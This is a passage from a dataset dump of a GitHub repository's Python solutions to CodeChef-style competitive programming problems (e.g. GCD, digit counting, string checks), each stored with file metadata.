"k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b,n=[int(i) for i in input().split()]\n if(int(n%2)==1):\n a*=2\n print(int(max(a,b)//min(a,b)))\n \n \n \n \n" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.5416666865348816, "avg_line_length": 31, "blob_id": "bc12580b7fd63cbaaef0e4cdee89b917ca0031b7", "content_id": "128b0a2df87db56a0a8d528fa6cbfd23fcb7ff57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 96, "license_type": "no_license", "max_line_length": 41, 
"num_lines": 3, "path": "/REMISS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n print(max(a,b),a+b)\n" }, { "alpha_fraction": 0.44247788190841675, "alphanum_fraction": 0.4601770043373108, "avg_line_length": 19.090909957885742, "blob_id": "480c69b3bba85cc0e3f9ac5a6b7559853d6cf22f", "content_id": "6724070efda64995067d67e6b33622099c148389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/RD19.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n p=a[0]\n for i in range(n):\n p=math.gcd(p,a[i])\n if(p==1):\n print(0)\n else:\n print(-1)\n \n" }, { "alpha_fraction": 0.3333333432674408, "alphanum_fraction": 0.35474005341529846, "avg_line_length": 22.846153259277344, "blob_id": "33ddded094f925729cb460607e88310a7718584f", "content_id": "916af56bcfed1004cc4a05ed341ee80fd19626e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 327, "license_type": "no_license", "max_line_length": 39, "num_lines": 13, "path": "/KTTABLE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n b=[int(i) for i in input().split()]\n c=0\n for i in range(n):\n if(i==0):\n if(b[0]<=a[0]):\n c+=1\n else:\n if(b[i]<=a[i]-a[i-1]):\n c+=1\n print(c)\n \n" }, { "alpha_fraction": 0.5348837375640869, "alphanum_fraction": 0.5348837375640869, "avg_line_length": 24.799999237060547, "blob_id": "efc20fdf62f54bd514771ebf7598a0c2f6cbcd13", "content_id": "21155c689caacc47b08d1975e762c0e40a71365d", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 41, "num_lines": 5, "path": "/RECTSQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n l,b=[int(i) for i in input().split()]\n x=math.gcd(l,b)\n print((l//x)*(b//x))\n" }, { "alpha_fraction": 0.3445378243923187, "alphanum_fraction": 0.3669467866420746, "avg_line_length": 17.052631378173828, "blob_id": "2540c8a987f3fc19a3cea874fd76e003c3cdf7ea", "content_id": "e0b8513789c7887025edaf9f5fdfb9b3bd3025c3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 357, "license_type": "no_license", "max_line_length": 39, "num_lines": 19, "path": "/PLAYPIAN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n n=len(s)//2\n a=list()\n p=0\n k=2\n flag=0\n for i in range(n):\n a.append(s[p:k])\n k+=2\n p+=2\n for i in range(n):\n if (\"AB\"!=a[i] and \"BA\"!=a[i]):\n flag+=1\n break\n if(flag==0):\n print(\"yes\")\n else:\n print(\"no\")\n \n \n" }, { "alpha_fraction": 0.36000001430511475, "alphanum_fraction": 0.4057142734527588, "avg_line_length": 17.88888931274414, "blob_id": "ef13ce58f11e89dbf116c999095e55bb55a6d0d0", "content_id": "61caa738c3ae78fdcd0207869694ec8bfc8908ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 175, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/LUCKFOUR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n count =0\n n=int(input())\n while(n>0):\n d=int(n%10)\n if(d==4):\n count+=1\n n=n//10\n print(count)\n \n" }, { "alpha_fraction": 0.4331550896167755, "alphanum_fraction": 0.47593581676483154, "avg_line_length": 25.714284896850586, "blob_id": 
"7a13c5aa9bfd52e87ecb820174b5425d2d3144a8", "content_id": "66da2bed71e3093441fde6364a8aab334f3e161f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 187, "license_type": "no_license", "max_line_length": 41, "num_lines": 7, "path": "/FLOW009.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n q,p=[int(i) for i in input().split()]\n if(q>1000):\n pr=float((q*p)-((q*p)/10))\n else:\n pr=float(q*p)\n print(\"{0:.6f}\".format(pr))\n" }, { "alpha_fraction": 0.41999998688697815, "alphanum_fraction": 0.4320000112056732, "avg_line_length": 21.727272033691406, "blob_id": "b5ce425dd4f27f0fe767017b5441c5155485cf87", "content_id": "8502507c3ded2d15e1565ef400a5dd8e2bf2507b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/LINCHESS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n p=[int(i) for i in input().split()]\n a=[]\n for i in p:\n if(k%i==0):\n a.append(i)\n if(len(a)==0):\n print(-1)\n else:\n print(max(a))\n" }, { "alpha_fraction": 0.35789474844932556, "alphanum_fraction": 0.38596490025520325, "avg_line_length": 20.538461685180664, "blob_id": "1c8280ef99e7e31434c66ed784fb5af5547cab4e", "content_id": "6d928cde1a7710942d3fc8327b01898f4590ea8e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/NW1.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,st1=input().split()\n n=int(n)\n s=[0]*7\n st=[\"mon\", \"tues\", \"wed\", \"thurs\", \"fri\", \"sat\" , \"sun\"]\n b=st.index(st1)\n for 
i in range(n):\n s[b]+=1\n if(b!=6):\n b+=1\n else:\n b=0\n print(*s)\n \n" }, { "alpha_fraction": 0.4455445408821106, "alphanum_fraction": 0.4653465449810028, "avg_line_length": 24.125, "blob_id": "dff5c64f1ff0a1f7ae5c87dd33b1319b276270a4", "content_id": "c2df889c8381790eec36074d357b19296b72f637", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 202, "license_type": "no_license", "max_line_length": 41, "num_lines": 8, "path": "/TWEED.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,s=input().split()\n n=int(n)\n a = [int(i) for i in input().split()]\n if n==1 and s=='Dee' and a[0]%2==0:\n print(\"Dee\")\n else:\n print(\"Dum\")\n\n" }, { "alpha_fraction": 0.31698113679885864, "alphanum_fraction": 0.3396226465702057, "avg_line_length": 16.33333396911621, "blob_id": "0b29277af92b068e0a91b19b99a98ea23238c7c9", "content_id": "8a019bf7b7163383a54f51ce8b1a41cd1e7f57ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 265, "license_type": "no_license", "max_line_length": 29, "num_lines": 15, "path": "/COLOR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=input()\n r=0\n g=0\n b=0\n for i in range(len(s)):\n if(s[i]=='R'):\n r+=1\n elif(s[i]=='G'):\n g+=1\n else:\n b+=1\n m=max(r,g,b)\n print(n-m)\n \n" }, { "alpha_fraction": 0.29556649923324585, "alphanum_fraction": 0.32019704580307007, "avg_line_length": 18.095237731933594, "blob_id": "3b3c5a4d4e3366b6fd7d92e6827071add3eb16e7", "content_id": "0321c34c472961e45b102304db98ff3c863257ec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 406, "license_type": "no_license", "max_line_length": 29, "num_lines": 21, "path": "/HEADBOB.py", "repo_name": "k0malSharma/Competitive-programming", 
"src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=int(input())\n c=0\n s=input()\n for i in s:\n if(i=='I'):\n c=1\n break\n elif(i=='Y'):\n c=2\n else:\n if(c==2 or c==1):\n c=2\n else:\n c=3\n if(c==1):\n print(\"INDIAN\")\n if(c==2):\n print(\"NOT INDIAN\")\n if(c==3):\n print(\"NOT SURE\")\n \n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 21.5, "blob_id": "b94ab0a00dfa60b955d1cb540cafc1375bd99d33", "content_id": "6e50f65defe0b1476b25dc0aa28f061ece9b0a75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 90, "license_type": "no_license", "max_line_length": 29, "num_lines": 4, "path": "/FSQRT.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "import math\nfor _ in range(int(input())):\n n=int(input())\n print(int(math.sqrt(n)))\n" }, { "alpha_fraction": 0.44392523169517517, "alphanum_fraction": 0.4579439163208008, "avg_line_length": 25.75, "blob_id": "d4ba466b01623845595dcd3be3ceedb58dca3399", "content_id": "989f6f8809d56c75b23ccd014336e3e99642884f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 214, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/AVG.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k,v=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n x=(v*(n+k))-sum(a)\n if (x%k==0 and x/k>0):\n print(x//k)\n else:\n print(\"-1\")\n" }, { "alpha_fraction": 0.4232558012008667, "alphanum_fraction": 0.4232558012008667, "avg_line_length": 20, "blob_id": "01e6075aa10184954ee06a02244a4d71af08c94f", "content_id": "b726cefb64480e7aa6d272d8a0c507f86f8609b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", 
"max_line_length": 39, "num_lines": 10, "path": "/CFRTEST.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n d=[int(i) for i in input().split()]\n a=[]\n for i in d:\n if i in a:\n continue\n else:\n a.append(i)\n print(len(a))\n \n" }, { "alpha_fraction": 0.36567163467407227, "alphanum_fraction": 0.38805970549583435, "avg_line_length": 17.5, "blob_id": "2314dd7481daf6e3d664fc4846598da50e9b2c6f", "content_id": "685cfc295ed517548dd624e797fe005570e32e19", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 134, "license_type": "no_license", "max_line_length": 29, "num_lines": 6, "path": "/FLOW018.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=1\n n=int(input())\n for i in range(1,n+1):\n s=s*i\n print(s) \n \n" }, { "alpha_fraction": 0.5, "alphanum_fraction": 0.5230769515037537, "avg_line_length": 15.25, "blob_id": "ecb87956936e95fd24a0486ff6e325819d1660b3", "content_id": "7217a8fcd5f7b0e82b9b8ee8e96e7bbffd5fa686", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/MAXREM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\na=[int(i) for i in input().split()]\nb=list(set(a))\nif(len(b)==1):\n print(0)\nelse:\n b.sort()\n print(b[-2])\n" }, { "alpha_fraction": 0.2904483377933502, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 17.814815521240234, "blob_id": "3cc62454fde60a66c6168e258b787a9d112d0fe1", "content_id": "2bcb5bd00e2809a2d3b54695519779ada06acde0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 44, "num_lines": 27, "path": 
"/CRDGAME.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n ch=0 \n mt=0 \n for j in range(0,n):\n a,b=map(int,input().strip().split())\n m=0 \n n=0 \n while a>0:\n m+= a%10\n a=a//10\n while b>0:\n n+=b%10\n b=b//10\n if m>n:\n ch+=1 \n elif m<n:\n mt+=1 \n else:\n ch+=1 \n mt+=1 \n if ch>mt:\n print(0,ch)\n elif ch<mt:\n print(1,mt)\n else:\n print(2,ch)\n \n" }, { "alpha_fraction": 0.5166666507720947, "alphanum_fraction": 0.5166666507720947, "avg_line_length": 29, "blob_id": "96d87d88bac6f98dcb17cd251bd5180cac803bb3", "content_id": "ed19139a7f39d4e400f9a75d8ad3c6962660c762", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 120, "license_type": "no_license", "max_line_length": 41, "num_lines": 4, "path": "/SALARY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n = int(input())\n w = [int(i) for i in input().split()]\n print(sum(w)-n*min(w))\n" }, { "alpha_fraction": 0.45378151535987854, "alphanum_fraction": 0.47058823704719543, "avg_line_length": 28.125, "blob_id": "629c37c07886790a177f5af05bc24a15a69b1c27", "content_id": "6770517f417811b616510c892076c294f01a1c97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 238, "license_type": "no_license", "max_line_length": 50, "num_lines": 8, "path": "/NITIKA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for t in range(int(input())):\n s=[str(i) for i in input().split()]\n n=len(s)-1\n for i in range(n):\n st=str(s[i][:1]).upper()\n print(st,end=\". 
\")\n st=str(s[n][:1]).upper()+str(s[n][1:]).lower()\n print(st)\n \n" }, { "alpha_fraction": 0.33557048439979553, "alphanum_fraction": 0.3557046949863434, "avg_line_length": 18.866666793823242, "blob_id": "521d1ceb4dab82e2595c565c72f28595a7e310df", "content_id": "f9d45f41808936209f2b846a1ad509e43521253a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 298, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/CHEFNWRK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n w=[int(i) for i in input().split()]\n p,s=1,0\n i=0\n while(i<n):\n s+=w[i]\n if(s>k):\n s=w[i]\n p+=1\n if(w[i]>k):\n p=-1\n break\n i+=1\n print(p)\n" }, { "alpha_fraction": 0.4536082446575165, "alphanum_fraction": 0.469072163105011, "avg_line_length": 20.55555534362793, "blob_id": "a3dcef3cf2bc476b29c3ad89343f90c69de089c0", "content_id": "194346dd7f82ab3e061e14ba38087d94d598f549", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 194, "license_type": "no_license", "max_line_length": 51, "num_lines": 9, "path": "/RRJOKE.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n p=[]\n for i in range(n):\n p.append([int(i) for i in input().split()])\n s=0\n for i in range(1,n+1):\n s^=i\n print(s)\n" }, { "alpha_fraction": 0.4436090290546417, "alphanum_fraction": 0.4436090290546417, "avg_line_length": 25.600000381469727, "blob_id": "1d6e3a8faeb7261ed17eab87053bf838286e51d4", "content_id": "eebcdb004853ee1d3b2112095661841c8c834b10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 266, "license_type": "no_license", "max_line_length": 29, "num_lines": 10, "path": "/FLOW010.py", "repo_name": 
"k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n ch=input()\n if (ch==\"B\" or ch==\"b\"):\n print(\"BattleShip\")\n if (ch==\"C\" or ch==\"c\"):\n print(\"Cruiser\")\n if (ch==\"D\" or ch==\"d\"):\n print(\"Destroyer\")\n if (ch==\"F\" or ch==\"f\"):\n print(\"Frigate\")\n" }, { "alpha_fraction": 0.3206896483898163, "alphanum_fraction": 0.3379310369491577, "avg_line_length": 20.230770111083984, "blob_id": "79d25f55e3357ecfe0fff38d547c1b104af3a493", "content_id": "af45d86537fd886b4e842ac20837fd16827f2658", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 33, "num_lines": 13, "path": "/RECNDSTR.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s=input()\n if(len(s)==1 or len(s)==2):\n print(\"YES\")\n else:\n v=\"\"\n for i in range(2,len(s)):\n v+=s[i]\n v+=s[0]+s[1]\n if(v==s):\n print(\"YES\")\n else:\n print(\"NO\")\n \n \n" }, { "alpha_fraction": 0.37272727489471436, "alphanum_fraction": 0.3909091055393219, "avg_line_length": 21, "blob_id": "d7639144d0b816f11e2c11c6b4ea26120dc2b1f3", "content_id": "565f26e5a9920906f1740c49135a5e154971e2b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 220, "license_type": "no_license", "max_line_length": 39, "num_lines": 10, "path": "/CLLCM.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n for i in a:\n if(i%2==0):\n print(\"NO\")\n n=-1\n break\n if(n!=-1):\n print(\"YES\")\n" }, { "alpha_fraction": 0.3722222149372101, "alphanum_fraction": 0.4027777910232544, "avg_line_length": 24.35714340209961, "blob_id": "caa7d320989e73cb1bd0b81e22e01b5afc458a2e", "content_id": 
"e175bf55aaee2d4b792e89bc37ef586cb17352e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 360, "license_type": "no_license", "max_line_length": 47, "num_lines": 14, "path": "/PPATTERN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[[0 for i in range(n)] for j in range(n)]\n k = 1\n for i in range(1,n+1):\n for j in range(i):\n a[j][i-1-j] = str(k)\n k+=1\n for i in range(n-1,0,-1):\n for j in range(i):\n a[n-i+j][n-1-j]= str(k)\n k+=1\n for i in a:\n print(*i)\n \n" }, { "alpha_fraction": 0.40760868787765503, "alphanum_fraction": 0.42391303181648254, "avg_line_length": 17.399999618530273, "blob_id": "8cb540af97d1fa9a3fda65f0d161322eb2e44603", "content_id": "323357e60f9cd0f95b109d056bf8e2d8871071f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 184, "license_type": "no_license", "max_line_length": 43, "num_lines": 10, "path": "/FRUITS.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,m,k=[int(i) for i in input().split()]\n diff=0\n if n<m:\n m,n=n,m\n m+=k\n if(n-m<=0):\n print(0)\n else:\n print(n-m)\n" }, { "alpha_fraction": 0.4309392273426056, "alphanum_fraction": 0.4364641010761261, "avg_line_length": 24.14285659790039, "blob_id": "f950ccc67fb082ec03fe031dec4f21f08d47993e", "content_id": "76776bbdfa3b0a2ca335cb2d9d613be5dd3bb757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 39, "num_lines": 7, "path": "/FLOW017.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=[int(i) for i in input().split()]\n x=min(a)\n y=max(a)\n for i in range(3):\n if(a[i]!=x and a[i]!=y):\n print(a[i])\n \n" }, { 
"alpha_fraction": 0.30649352073669434, "alphanum_fraction": 0.33246752619743347, "avg_line_length": 23.0625, "blob_id": "f07d5630a906ebf2cab993f7d4db9dc78c8ce412", "content_id": "777092657345af67822473133e315dcb0eb0a531", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 385, "license_type": "no_license", "max_line_length": 43, "num_lines": 16, "path": "/TEMPLELA.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n s=[int(i) for i in input().split()]\n if(n%2==0):\n print(\"no\")\n else:\n k=1\n for i in range((n//2)+1):\n if(s[i]==s[n-i-1] and s[i]==k):\n k+=1\n else:\n print(\"no\")\n k=-1\n break\n if(k==(n//2)+2):\n print(\"yes\")\n" }, { "alpha_fraction": 0.34224599599838257, "alphanum_fraction": 0.3957219123840332, "avg_line_length": 17.700000762939453, "blob_id": "91b76258a3f484186323fba7b0c265d28a308d33", "content_id": "3701b8653d152369701f4c33d9ca202298e0cb04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 374, "license_type": "no_license", "max_line_length": 35, "num_lines": 20, "path": "/CHEFWORK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=int(input())\nc=[int(i) for i in input().split()]\nt=[int(i) for i in input().split()]\np=100001\nx,y=100001,100001\nfor i in range(n):\n if(t[i]==3):\n if(c[i]<p):\n p=c[i]\n else:\n if(t[i]==1):\n if(c[i]<x):\n x=c[i]\n else:\n if(c[i]<y):\n y=c[i]\nif(p<=x+y):\n print(p)\nelse:\n print(x+y)\n" }, { "alpha_fraction": 0.45588234066963196, "alphanum_fraction": 0.5073529481887817, "avg_line_length": 12.600000381469727, "blob_id": "5f0fb229dd6d28a46ec182dbb2e0eec04c3591d5", "content_id": "9c5999614bb6cdedc5acb96c9ce0499de08ac885", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 136, "license_type": "no_license", 
"max_line_length": 31, "num_lines": 10, "path": "/HOWMANY.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "n=input()\na=len(n)\nif(a==1):\n print(\"1\")\nelif(a==2):\n print(\"2\")\nelif(a==3):\n print(\"3\")\nelse:\n print(\"More than 3 digits\")\n" }, { "alpha_fraction": 0.3400000035762787, "alphanum_fraction": 0.375, "avg_line_length": 17.18181800842285, "blob_id": "c1b38a3155fc58aa71b2269c3646719abe6d9683", "content_id": "23191f8f5923de513b8b3af4d1ec4f708780f945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 200, "license_type": "no_license", "max_line_length": 41, "num_lines": 11, "path": "/CHFMOT18.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n s,n=[int(i) for i in input().split()]\n p=0\n if(s==1 or s%2!=0):\n p=1\n s-=1\n while(s>=2):\n p+=s//n\n s%=n\n n=s\n print(p)\n" }, { "alpha_fraction": 0.3316326439380646, "alphanum_fraction": 0.3443877696990967, "avg_line_length": 25.133333206176758, "blob_id": "a293b8321d16f43cee2666e2712ffb4f39521e02", "content_id": "ec115efa18cf4c00bafd04f1c0e9ed361c55b9a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 392, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/POPGATES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[i for i in input().split()]\n for i in range(n-1,n-k-1,-1):\n if(a[i]=='H'):\n for j in range(i):\n if(a[j]=='H'):\n a[j]='T'\n else:\n a[j]='H'\n c=0\n for i in range(n-k):\n if(a[i]=='H'):\n c+=1\n print(c)\n" }, { "alpha_fraction": 0.3232323229312897, "alphanum_fraction": 0.40909090638160706, "avg_line_length": 18.299999237060547, "blob_id": "20ba63892670f781ed3dd008edbd7597cff6e350", "content_id": 
"e8d119437152933519664484ba0973ebd257fc3a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 198, "license_type": "no_license", "max_line_length": 41, "num_lines": 10, "path": "/MATCHES.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "s=[6,2,5,5,4,5,6,3,7,6]\nfor _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n n=a+b\n p,d=0,0\n while(n>0):\n d=n%10\n p+=s[d]\n n//=10\n print(p)\n \n" }, { "alpha_fraction": 0.3195592164993286, "alphanum_fraction": 0.35537189245224, "avg_line_length": 20.352941513061523, "blob_id": "3902e5361a7ed4d6e73adbdabf0f5e5d50e4ab4d", "content_id": "5fb04ffcc0d1555e5fc87ae194b3ad44d5d86aba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 363, "license_type": "no_license", "max_line_length": 50, "num_lines": 17, "path": "/SPELLBOB.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a=input()\n b=input()\n c=[0,0,0]\n bc=0\n oc=0\n for i in range(3):\n if(a[i]=='b' or b[i]=='b'):\n bc+=1\n c[i]+=1\n if(a[i]=='o' or b[i]=='o'):\n oc+=1\n c[i]+=1\n if all(i>=1 for i in c) and (bc>=2 and oc>=1):\n print(\"yes\")\n else:\n print(\"no\")\n" }, { "alpha_fraction": 0.3352601230144501, "alphanum_fraction": 0.3757225573062897, "avg_line_length": 18.22222137451172, "blob_id": "3099bba1e5717ef5037e3862ac5ae1f3eeffa50c", "content_id": "86f26bda64f213f75a12bc9aea6c70a928304aa1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 173, "license_type": "no_license", "max_line_length": 29, "num_lines": 9, "path": "/TRISQ.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n b = int(input())\n if b<4:\n print(0)\n continue\n else:\n if b%2==1:\n b-=1\n print(((b-2)*(b))//8)\n" }, { 
"alpha_fraction": 0.30214425921440125, "alphanum_fraction": 0.32943469285964966, "avg_line_length": 23.428571701049805, "blob_id": "b0cd148c7c31092564c669b822bd02d1730befd2", "content_id": "bcc9d81e49c852bba0bfa3d8ac4ac76c7438558f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 513, "license_type": "no_license", "max_line_length": 51, "num_lines": 21, "path": "/PIPSQUIK.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,h,y1,y2,l=[int(i) for i in input().split()]\n t=[0]*n\n x=[0]*n\n for i in range(n):\n t[i],x[i]=[int(i) for i in input().split()]\n if(n<l):\n print(n)\n else:\n k=0\n for i in range(n):\n if (t[i]==1 and (h-y1)<=x[i]):\n k+=1\n elif (t[i]==2 and y2>=x[i]):\n k+=1\n else:\n l-=1\n if(l==0):\n break\n k+=1\n print(k)\n" }, { "alpha_fraction": 0.28409090638160706, "alphanum_fraction": 0.3011363744735718, "avg_line_length": 21.133333206176758, "blob_id": "f8f52935902049d42552ccb3bdff46f5022bd8cd", "content_id": "b348a65a41a0c7f7b7b9ff80ffea29bc6cad8867", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 352, "license_type": "no_license", "max_line_length": 41, "num_lines": 15, "path": "/CANDY123.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n a,b=[int(i) for i in input().split()]\n x,y,i=0,0,1\n while(True):\n if(i%2==0):\n y+=i\n if(y>b):\n print(\"Limak\")\n break\n else:\n x+=i\n if(x>a):\n print(\"Bob\")\n break\n i+=1\n \n \n \n" }, { "alpha_fraction": 0.3730158805847168, "alphanum_fraction": 0.3849206268787384, "avg_line_length": 21.909090042114258, "blob_id": "d384839843798199a90e566a0c723bdf80ee24c5", "content_id": "e188c08b4e7b0ba6a7a7574212b5d14ccc2f3758", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 252, "license_type": 
"no_license", "max_line_length": 41, "num_lines": 11, "path": "/ATM2.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n,k=[int(i) for i in input().split()]\n a=[int(i) for i in input().split()]\n s=\"\"\n for i in range(n):\n if(k-a[i]>=0):\n k-=a[i]\n s+=\"1\"\n else:\n s+=\"0\"\n print(s)\n" }, { "alpha_fraction": 0.38591548800468445, "alphanum_fraction": 0.4169014096260071, "avg_line_length": 22.33333396911621, "blob_id": "e491a14dfaba85bfc388cc8c4d4973facfab2797", "content_id": "a8c02af573e92d71ca5f57b1445bf87079098c1d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 39, "num_lines": 15, "path": "/TOWIN.py", "repo_name": "k0malSharma/Competitive-programming", "src_encoding": "UTF-8", "text": "for _ in range(int(input())):\n n=int(input())\n a=[int(i) for i in input().split()]\n if(n==1):\n print(\"first\")\n else:\n a.sort(reverse=True)\n p1=a[1]+sum(a[2::2])\n p2=sum(a)-p1\n if(p1<p2):\n print(\"first\")\n elif(p1>p2):\n print(\"second\")\n else:\n print(\"draw\")\n \n" }, { "alpha_fraction": 